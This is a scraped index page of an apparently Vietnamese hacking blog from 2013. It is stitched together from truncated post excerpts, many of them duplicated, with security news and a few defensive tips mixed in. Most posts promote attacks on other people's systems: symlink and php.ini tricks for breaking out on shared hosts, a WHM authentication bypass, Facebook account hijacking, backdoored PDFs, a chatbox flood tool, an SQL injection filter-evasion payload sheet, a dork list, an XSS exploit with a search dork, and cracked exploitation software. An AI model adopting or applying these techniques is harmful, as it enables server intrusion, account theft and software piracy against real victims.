Trước đó, mình có viết 1 tool flood ChangUonDyU Chatbox, nhưng thực sự thì thấy nếu chỉ flood chatbox của ChangUonDyU thì không ổn. Mình viết lại 1 tool flood nhiều thứ hơn thế nữa. Xem nào!
READ MORE »
Thứ Sáu, 28 tháng 6, 2013
Facebook thừa nhận rò rỉ thông tin của 6 triệu người sử dụng
Facebook Inc đã thừa nhận đã để rò rỉ số điện thoại và địa chỉ email của 6 triệu người sử dụng trong năm qua, con số được công ty mạng xã hội lớn nhất thế giới công bố cuối ngày 21-6.
Facebook đã thông tin về sự rò rỉ dữ liệu, bắt đầu vào năm 2012, do một trục trặc kỹ thuật trong kho lưu trữ thông tin khổng lồ được thu thập từ 1,1 tỷ người sử dụng trên toàn thế giới. Lỗ hổng này đã cho phép người dùng Facebook tải về dữ liệu từ danh sách bạn bè của họ, bao gồm cả những thông tin mà họ không được phép có.Geek là ai?
Là người dùng Internet thường xuyên, chắc hẳn rất nhiều người trong chúng ta đã đôi lần bắt gặp thuật ngữ geek trong các bài viết trên mạng, nhưng không nhiều người nắm được ý nghĩa thật sự của từ ngữ này.
Trước tiên, geek không phải là một cái gì mà là một cá nhân, một con người. Trong thời đại bùng nổ thông tin và công nghệ như hiện nay, geeks đã trở thành các nguồn không chỉ tạo ra mà còn chọn lựa và giới thiệu rất nhiều những thông tin hữu ích. Họ còn kết nối lại với nhau để tạo thành những cộng đồng có cùng những mối quan tâm và đam mê. Vì thế thật quan trọng cho chúng ta để hiểu được thật sự geek là ai? Và họ làm những gì?Lật tẩy chiêu kiếm follow ảo của các "hotgirl Facebook"
Để phục vụ nhu cầu tăng follow cho nhiều "hotboy", "hotgirl" Facebook nhiều dịch vụ mua bán, kinh doanh subcriber nở rộ hơn bao giờ hết.
Kể từ khi Facebook giới thiệu chức năng người theo dõi (Subcriber) tới nay, số lượng subcriber đã phần nào thể hiện độ "hot" của chủ tài khoản.Không khó để bắt gặp một tài khoản Facebook có số người theo dõi lên tới hàng chục nghìn, điều đáng nói là chủ sở hữu phần lớn là những người bình thường, không được nhiều người biết tới. Vậy đâu là sự thật của những con số subcribers khủng mà họ sở hữu?
Ngăn chặn virus nhiễm từ USB vào máy tính
Phrozen Safe USB là một công cụ hữu ích giúp bạn vô hiệu hóa việc sử dụng các thiết bị USB trên máy tính cá nhân của mình.
READ MORE »
Vô hiệu hóa và thiết lập mật khẩu cho kết nối cổng USB
Phần mềm miễn phí giúp nhanh chóng vô hiệu hóa và thiết lập mật khẩu cho kết nối cổng USB.
Nếu bạn đang làm việc ở văn phòng với nhiều người xung  quanh, và thật khó chịu khi họ không mang theo máy tính cá nhân để làm  việc, chắc hẳn họ sẽ sử dụng ‘tạm’ máy tính của bạn trong khi bạn không  có mặt. Việc làm này đôi khi mang lại khá nhiều rủi ro và nguy hiểm cho  dữ liệu cá nhân của bạn có trong máy tính nếu chẳng may người khác dùng  USB để sao chép, chỉnh sửa hoặc thao tác gây mất mác hay hư hại dữ liệu  thì thật phiền phức.
Tăng tốc độ khởi động cho Chrome với FooTab
Có khi nào bạn ngán ngẩm mỗi khi trình duyệt Chrome tắt giữa chừng và phải khởi động lại số tab đó cùng một lúc? Kết quả: treo trình duyệt.
Trong khi đang lướt web, bạn lỡ tay tắt trình duyệt đi hay do mất điện làm tắt máy và trong lần khởi động trình duyệt lại Chrome sẽ tự động tải lại các tab bạn đã mở trước đó. Trường hợp số tab này lên vài chục chắc chắn quá trình khởi động và tải lại các trang web sẽ rất mất thời gian và có thể gây treo máy vì các tab này được tải cùng lúc chứ không phải theo thứ tự mở trước sau.Cách sử dụng Hashtag trên Facebook hiệu quả
Nghĩ tới hashtag, mọi người sẽ  nghĩ ngay tới Twitter. Có lẽ việc Twitter sử dụng hashtags cho dịch vụ  của mình đã quá thành công khiến các mạng xã hội khác cũng bổ sung chức  năng này cho dịch vụ của mình, điển hình có Instagram.

Sự phổ biến của hashtag khiến Facebook mạng xã hội lớn nhất hành tinh cũng bắt tay đưa chức năng này vào dịch vụ của mình. Hashtag trên Facebook được sử dụng trong các status, comment của người dùng và các hashtag sẽ được liên kết tới một trang hasgtag chung để mọi người cùng thảo luận, trao đổi cho một chủ đề liên quan đến hashtag đó.
READ MORE »
Sự phổ biến của hashtag khiến Facebook mạng xã hội lớn nhất hành tinh cũng bắt tay đưa chức năng này vào dịch vụ của mình. Hashtag trên Facebook được sử dụng trong các status, comment của người dùng và các hashtag sẽ được liên kết tới một trang hasgtag chung để mọi người cùng thảo luận, trao đổi cho một chủ đề liên quan đến hashtag đó.
READ MORE »
6 add-on Firefox nên cài ngay cho trình duyệt!
Mặc dù máy tính của bạn đã cài một trình antivirus đáng tin cậy để bảo vệ máy tính tránh khỏi các cuộc tấn công mạng cũng như các phần mềm độc hại. Và để bảo vệ thông tin cá nhân mình hạn chế bị rò rỉ hay mất mác không đáng có thì hãy cài thêm một trong các add-on cho Firefox giới thiệu dưới đây.
READ MORE »
READ MORE »
Tổng hợp các công cụ Upload và chia sẻ dữ liệu ngay trên Desktop
Bài viết này sẽ tổng hợp một số các ứng dụng giúp upload và chia sẻ dữ liệu ngay trên màn hình Desktop.
Ngày nay, người dùng có thể dễ dàng kết nối vào thế giới Internet thông qua các hình thức kết nối khác nhau như ADSL, Wifi, D-Com 3G,.. vì thế môi trường làm việc của chúng ta luôn luôn trực tuyến và sẳn sàng cho nhu cầu làm việc Online ngay trên màn hình Desktop của máy tính mà không cần thiết phải mở trình duyệt và truy cập vào các dịch vụ web.READ MORE »
Crash a small website with Firebug
2. Open up Firefox, and go to the tool bar.. open Tools>Addons, and then go to get addons, and search: Firebug.
3. Install Firebug, and then restart Firefox.
4. Firebug should be at the bottom right corner of your browser. Now just go to the small blog and/or website of your choice.
Oracle SQL Injection Tutorial
Oracle SQL Injection Tutorial. 
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.
READ MORE »
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.
Thứ Năm, 27 tháng 6, 2013
Project Amaterasu Release 1
The script consist of 10 Most used Tools by Hackers and Pentesters.
2 Private scripts , 1 - Subdomain scanner , 2- Ftp Brute forcer.
it is release 1 , In next list , it will contain up 5 private scripts diff from this.
in Final , it will have all Private scripts plus my own coded scripts :)
READ MORE »
Bypass Symlink Work 100% By Mauritania Attacker Private!
Bypass Symlink Work 100% By Mauritania Attacker Private!
You can Bypass any server with this method you just need to do some little changes in the following file :
* php.ini
* and bypass suEXEC
For example i have this simple "php.ini"
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
READ MORE »
You can Bypass any server with this method you just need to do some little changes in the following file :
* php.ini
* and bypass suEXEC
For example i have this simple "php.ini"
safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On
READ MORE »
BYPASS WHM AUTHENTICATION OF RESELLER
Hie :)
Today We are Going to Bypass WHM Authentication of Reseller Accounts!
For This We Need Shell On The Reseller Account!! i.e Shell On Reseller's Domain!
Note 1:
For Identification of Reseller Account ! We have 2 Page in "Public_html" Dir With Name "moving.page" And "suspended.page"
READ MORE »
Today We are Going to Bypass WHM Authentication of Reseller Accounts!
For This We Need Shell On The Reseller Account!! i.e Shell On Reseller's Domain!
Note 1:
For Identification of Reseller Account ! We have 2 Page in "Public_html" Dir With Name "moving.page" And "suspended.page"
READ MORE »
HIJACKING A FACEBOOK ACCOUNT WITH SMS
This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy.
Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address.
The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, andprofile_id, which is the account to link the number to.
READ MORE »
Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address.
The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main are code, which is the verification code received via your mobile, andprofile_id, which is the account to link the number to.
READ MORE »
Thứ Ba, 25 tháng 6, 2013
Bypass Symlink on Linux Servers by Sen Hacker
Hello Every One Now I Manoj Nath and I am going to share the Sen Haxor's Tutorial on Bypassing Symlink on 2013 Linux servers :)
Hi Guys this is Sen.
Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods.
So Lets Get Started :)
Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers.
READ MORE »
Hi Guys this is Sen.
Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods.
So Lets Get Started :)
Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers.
READ MORE »
WordPress Xploiter Released by Team Freak Coderz
WordPress Xploiter is free WordPress Vulnerability Scanner. It is the first version of WordPress Xploiter.
This tool contains 251 WordPress Exploit including latest Exploits Till date 28-5-13
Its the Latest Project by the Team Freak CoderzThis tool contains 251 WordPress Exploit including latest Exploits Till date 28-5-13
READ MORE »
How Read Barrecode Or Qr Code Without A Scanner
Did you encounter once QR code and want to read it and  you do not have a smart phone? Once you need to know numbers bar  code, but you do not have a scanner codes? price that is used in  commercial purposes.
Server Bypass via Symlink - Jumping in server
As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
This idea have start from devilzc0de geeks and let me explain how it work.
READ MORE »
For getting success with this tutorial are required the following things:
- Python Installed on Server
- b374k.php shell
- And some scripts u will see below.
This idea have start from devilzc0de geeks and let me explain how it work.
READ MORE »
ADVANCED DNS HIJACKING TUTORIAL BY Eboz
Its not made by me. I am just sharing it.Eboz is a turkish hacker. Even he pwned pakisani's google, ebay and many sites.
ADVANCED DNS HIJACKING GUIDE
|=-----------------------------------------------------------------------=|
| =------------------= [Still hayattayız, and we are still going to 0wn.-------=]
|=-----------------------------------------------------------------------=|
| =-------------------= [Gaza our greetings!-----------------= |
|=-----------------------------------------------------------------------=|
by eboz
eb0z [at] hotmail.com
-[1]-the DNS Hijacking Presentation
READ MORE »
ADVANCED DNS HIJACKING GUIDE
|=-----------------------------------------------------------------------=|
| =------------------= [Still hayattayız, and we are still going to 0wn.-------=]
|=-----------------------------------------------------------------------=|
| =-------------------= [Gaza our greetings!-----------------= |
|=-----------------------------------------------------------------------=|
by eboz
eb0z [at] hotmail.com
-[1]-the DNS Hijacking Presentation
READ MORE »
Backdooring a pdf ebook with metasploit
As we all use RAT, Botnets but the  things went wrong when our rats and bots get detected by antiviruses.  But today i am gonna show you how to backdoor a pdf ebook. 
Yes a pdf ebook.
READ MORE »
Yes a pdf ebook.
READ MORE »
Rooting A Server Without Any Root Kernel Exploits
1 – Looking for Custom Cron Tab Scripts
Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.
READ MORE »
Blocking Automated Scanners Against Your Website
Blocking Automated Scanners Against Your Website.
 Credits: Cyberb0y.
We all know that there has been a vast development in automated vulnerability scanners. There are countless private , public , free commercial automated web vulnerability scanners. And since they are available all over the internet so it has become a easy thing for anyone to find out vulnerability in your website by running automated scanner against your website. And that results in problems for the webmasters. Even if the vulnerability is not detected but it affects the website as any automated scanner send numerous request to the website in order to conduct the vulnerability scan. And thereby the website gets affected in terms of the bandwidth or if any vulnerability is found it might get exploited. So better make an arrangement before to stop people using automated scanners on your website.
READ MORE »
FPD ~ Full Path Disclosure Vulnerability
Full path Disclosure
Hey everybody.Today we are going to talk about a very common web vulnerability "Full Path Disclosure".
Overview:=
Full Path Disclosure AKA, FPD vulnerabilities enable the attacker to see the internal path structure of an installation. Eg: /home/dir/htdocs/blahblah.
Rooting Windows OR How to gain RDP Access
Windows Rooting System or how to gain RDP Access.READ MORE »
Well this is diffirent from *Unix process there we use exploit here we use only commands
and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....
BIGGEST SQL Injection Dorks List ~20K+ Dorks
Here is the treasure, the biggest SQL dork list ever :) Hope it helps some newbies out there:
Get it here: http://pastebin.com/2QqQh9jg
Facebook issues data breach notification - may have leaked your email and phone number
Facebook just published a data breach notification on its security blog.
You might not immediately notice that from the title of the article, which announces itself as an "Important Message from Facebook's White Hat Program."
But the social networking giant is, indeed, reporting a data leakage problem.
The silver lining is that the quantity of data wrongly disclosed due to Facebook's bug seems to be modest, at least by the standards of a billion-user service.
The cloud (bad pun intended) is that Facebook's systems made the fault possible in the first place.
READ MORE »
You might not immediately notice that from the title of the article, which announces itself as an "Important Message from Facebook's White Hat Program."
But the social networking giant is, indeed, reporting a data leakage problem.
The silver lining is that the quantity of data wrongly disclosed due to Facebook's bug seems to be modest, at least by the standards of a billion-user service.
The cloud (bad pun intended) is that Facebook's systems made the fault possible in the first place.
READ MORE »
WappeX v 2.0 Cracked - Full Version
WappeX aka Web Application Exploiter is a Multi Vulnerability Scanning + Exploiting tool .
It contains all Hacking tool / Exploiting Tool for pentesting the Website via SQL Injection.
Team Has added the Havij also , one of the most Used Hacking tool .
Wappex is Completely a Package of Hacking tool.
READ MORE »
Master Sql Cheet With Waf sheets
SQLi filter evasion cheat sheet (MySQL)
Basic filter
Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1
Prefixes
+ - ~!
'Or - +2 = -!!! '2
Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL
READ MORE »
WAppEx1.0 + Crack (Web Application Exploiter + Crack)
Download Link is at the bottom of this post ^_^
Home page: http://www.itsecteam.com/products/web-application-exploiter-wappex/
![[Image: sqli.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vh2MyVQ0p0Eo2AtoG6EXDlrR4g5Q_CWvWryMYQUNZLrvGAob4LzdNbvbtogQRQ-EGZiSDiTfkyhdPQZDa_WX3Q6fz07oPVzHnjEzZhiPgbT2hBKb6H2O6fhxy7sLDQ7WO4h1I=s0-d)
READ MORE »
Home page: http://www.itsecteam.com/products/web-application-exploiter-wappex/
Facebook Hacking - A Compilation
Here's our new Books :
Hacking With Experts3 (Facebook Hacking)
Contents :
A. Facebook Account Hacking
1. Session Hijacking Attack
2. Facebook Security
3. Cookie Stealing Attack
4. Keylogger
5. Clickjacking
6. Tabnabbing
7. Remote Administrator Tool
8. Social Engineering Attack
9. Phising
10. Using 3 Friend Attack
11. ARP Poisoning
12. FB Password Decryptor
13. Hacking FB Accounts using GoogleDork List
14. FaceBook Fan PageHacking
15. Desktop Phising
READ MORE »
Get Most Traffic to your Blog
1) Blog frequently
Most new bloggers dislike hearing this. Trust me when I say that the struggle for content is ongoing. New bloggers, however, feel like it’s just happening to them. The truth is, don’t get a blog just to have a blog. Get it and keep it updated. It’s the quickest way to gaining traffic. How often should you blog? Three times a week. The best days to blog? Studies have shown that Tuesday, Wednesday, and Thursday are key days for blogging.
READ MORE »
Recover Hidden Files From Virus Infected Pendrive (Using CMD)

Pendrives are currently the best way to transfer data between two computers. Using pendrives is very easy, just plug it into your computer and transfer your files. You can also hide your important files very easily in windows.
READ MORE »
Thứ Hai, 24 tháng 6, 2013
Do your Facebook friends a favour. Remove all your imported contacts now!
Are you careful about your online security?  Have you been sensible  over the years about what information about yourself you choose to share  with Facebook?
Good. Well done.
Unfortunately, it isn’t enough.
Because, you don’t just need to be careful about what information you *yourself* have uploaded to Facebook. You also need to worry about what *other* people might have been sharing about you.
The truth is that, even if you have never had a Facebook account, the website might know your email address and phone number because of what your friends, acquaintances and colleagues might have told the website – perhaps unwittingly.
READ MORE »
Good. Well done.
Unfortunately, it isn’t enough.
Because, you don’t just need to be careful about what information you *yourself* have uploaded to Facebook. You also need to worry about what *other* people might have been sharing about you.
The truth is that, even if you have never had a Facebook account, the website might know your email address and phone number because of what your friends, acquaintances and colleagues might have told the website – perhaps unwittingly.
READ MORE »
SourceForge bị lợi dụng để phát tán mã độc
Trend  Micro vừa phát hiện một biến thể của mã nguồn độc hại có tên Gamarue,   liên quan tới SourceForge, một kho lưu trữ code trực tuyến.
Đây là phát hiện mới nhất kể từ sau đợt gia tăng mạnh mẽ của các mã nguồn nguy hiểm vào tháng 5/2013.
SourceForge cho phép người dùng lưu trữ trực tuyến một số lượng code lớn trên nền tảng điện toán đám mây nhằm phục vụ cho những dự án của họ. Điều này vô tình tạo ra một lượng mã nguồn mở trôi nổi, ẩn chứa những mối nguy hại cực lớn. Với hơn 4 triệu lượt download code hàng ngày, việc phát tán mã độc trên SourceForge trở nên rất lý tưởng và dễ dàng.
SourceForge cho phép người dùng lưu trữ trực tuyến một số lượng code lớn trên nền tảng điện toán đám mây nhằm phục vụ cho những dự án của họ. Điều này vô tình tạo ra một lượng mã nguồn mở trôi nổi, ẩn chứa những mối nguy hại cực lớn. Với hơn 4 triệu lượt download code hàng ngày, việc phát tán mã độc trên SourceForge trở nên rất lý tưởng và dễ dàng.
Thứ Bảy, 22 tháng 6, 2013
Yahoo attempts (and fails) to defend its crazy email plan
The story so far..
Yahoo came up with a (quite frankly) moronic plan, telling users that if they hadn’t logged into their Yahoo account in the last 12 months, and didn’t log in by July 15th 2013, the company was going to give other people the chance to grab the account.
READ MORE »
Yahoo came up with a (quite frankly) moronic plan, telling users that if they hadn’t logged into their Yahoo account in the last 12 months, and didn’t log in by July 15th 2013, the company was going to give other people the chance to grab the account.
READ MORE »
Facebook owns up to serious privacy breach. Tells the world late on a Friday night (again)
Any time that Facebook admits that it has exposed the privacy of millions of its users, it’s sure to gain the attention of the world’s newspapers and tech bloggers.
The latest news is that approximately 6 million Facebook users had their email addresses or telephone numbers inappropriately shared.
Bad enough, you might think, but when you dig down into how the breach occurred you realise that the users may *never* have uploaded those email addresses and contact numbers to Facebook themselves.
READ MORE »
The latest news is that approximately 6 million Facebook users had their email addresses or telephone numbers inappropriately shared.
Bad enough, you might think, but when you dig down into how the breach occurred you realise that the users may *never* have uploaded those email addresses and contact numbers to Facebook themselves.
READ MORE »
Facebook Comment's Picture Hijacking
Today Facebook rollouts for FB users to comment with picture on any  status. But the feature has a bug which allows malicious user to hijack  the picture from any comments if the picture is share by uploading for  comment. 
After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture.
Let's get started! all you need are status ID and victim's uploaded picture for comment ID.
READ MORE »
After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture.
Let's get started! all you need are status ID and victim's uploaded picture for comment ID.
READ MORE »
Thứ Tư, 12 tháng 6, 2013
Heads-up! If you use Internet Explorer, or MS Office on Windows *or* Mac, get your patches now!
Microsoft has released its regular monthly bundle of security fixes,  known as “Patch Tuesday”.  This time it doesn’t just mean security  patches for vulnerabilities in software running on the Windows platform –  Mac users could be at risk too.
As described in Microsoft’s security bulletin summary for June 2013, the most serious issues – rated “Critical” by the company – affect Internet Explorer, and if left unpatched could allow a remote attacker to run malicious code (such as a worm) on your computer just by you visiting a boobytrapped website.
The single MS13-047 security update for Internet Explorer addresses 19 separate vulnerabilities, affecting all supported versions of Internet Explorer from version 6 to IE 10, on all supported versions of Windows from XP to RT.
READ MORE »
As described in Microsoft’s security bulletin summary for June 2013, the most serious issues – rated “Critical” by the company – affect Internet Explorer, and if left unpatched could allow a remote attacker to run malicious code (such as a worm) on your computer just by you visiting a boobytrapped website.
The single MS13-047 security update for Internet Explorer addresses 19 separate vulnerabilities, affecting all supported versions of Internet Explorer from version 6 to IE 10, on all supported versions of Windows from XP to RT.
READ MORE »
Thứ Ba, 11 tháng 6, 2013
Phishing và cách phòng chống
1. Phishing
Phishing là một hình thức gian lận để có những thông tin nhạy cảm như username, password, credit card … bằng cách giả mạo như là một thực thể đáng tin cậy trong các giao tiếp trên mạng. Quá trình giao tiếp thường diễn ra tại các trang mạng xã hội nổi tiếng, các trang web đấu giá, mua bán hàng online…mà đa số người dùng đều không cảnh giác với nó. Phishing sử dụng email hoặc tin nhắn tức thời, gửi đến người dùng, yêu cầu họ cung cấp thông tin cần thiết. Người dùng vì sự chủ quan của mình đã cung cấp thông tin cho một trang web, trông thì có vẽ hợp pháp, nhưng lại là trang web giả mạo do các hacker lập nên.
READ MORE »
Phishing là một hình thức gian lận để có những thông tin nhạy cảm như username, password, credit card … bằng cách giả mạo như là một thực thể đáng tin cậy trong các giao tiếp trên mạng. Quá trình giao tiếp thường diễn ra tại các trang mạng xã hội nổi tiếng, các trang web đấu giá, mua bán hàng online…mà đa số người dùng đều không cảnh giác với nó. Phishing sử dụng email hoặc tin nhắn tức thời, gửi đến người dùng, yêu cầu họ cung cấp thông tin cần thiết. Người dùng vì sự chủ quan của mình đã cung cấp thông tin cho một trang web, trông thì có vẽ hợp pháp, nhưng lại là trang web giả mạo do các hacker lập nên.
READ MORE »
Burpsuite Pro 1.5.01
Burp  Suite is an integrated platform for performing security testing of web  applications. Its various tools work seamlessly together to support the  entire testing process, from initial mapping and analysis of an  application's attack surface, through to finding and exploiting security  vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
READ MORE »
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
READ MORE »
[J2TeaM] Facebook Information v2.0
| Main GUI | 
| Scan information about Personal User | 
| Scan information about Fan Page | 
| Auto detect input is User or Fan Page | 
Facebook Information <version 2.0>
Home page: http://junookyo.blogspot.com/
About:
+ Facebook Information is a simple tool for check information about anyone.
READ MORE »
[J2TeaM] Facebook Information v1.0
| Main GUI | 
| Scan information about Personal User | 
| Scan information about Fan Page | 
| Auto detect input is User or Fan Page | 
Facebook Information <version 1.0>
Home page: http://junookyo.blogspot.com/
About:
+ Facebook Information is a simple tool for check information about anyone.
READ MORE »
Tutorial: Fix bug SQL Injection Music Gift for vBB
Vào AdminCP > Plugins & Products > Plugin Manager, sau đó kéo xuống và tìm đến Plugin của mod Music Gift.
Sửa plugin có hook là ajax_start, thêm vào đoạn đầu phần Plugin PHP Code hàm sau (hàm này có tác dụng lọc input của câu lệnh SQL):
READ MORE »
function anti_sql($sql) {
$sql = str_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|*|--|\)/"),"",$sql);
return trim(strip_tags(addslashes($sql))); #strtolower()
}
READ MORE »
Thứ Hai, 10 tháng 6, 2013
ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive
# Exploit Title: ChangUonDyU - Extra File Chatbox XSS vulnerability at Archive
# Google Dork: intitle:"Tin nhắn lưu trữ" and inurl:archive.php?page=
# Date: 24/06/2013
# Exploit Author: Juno_okyo
# Vendor Homepage: http://hoiquantinhoc.com/
# Software Link: http://hoiquantinhoc.com/modifications-3-8-x/14749-changuondyu-extra-file-chatbox-3-6-0-a.html
# Version: 3.6.0 (may affect other versions)
# Tested on: vBulletin 3.8.7 (and affect other versions)
# CVE : http://www.vbulletin.com/
READ MORE »
# Google Dork: intitle:"Tin nhắn lưu trữ" and inurl:archive.php?page=
# Date: 24/06/2013
# Exploit Author: Juno_okyo
# Vendor Homepage: http://hoiquantinhoc.com/
# Software Link: http://hoiquantinhoc.com/modifications-3-8-x/14749-changuondyu-extra-file-chatbox-3-6-0-a.html
# Version: 3.6.0 (may affect other versions)
# Tested on: vBulletin 3.8.7 (and affect other versions)
# CVE : http://www.vbulletin.com/
READ MORE »
Đăng ký:
Nhận xét (Atom)
 



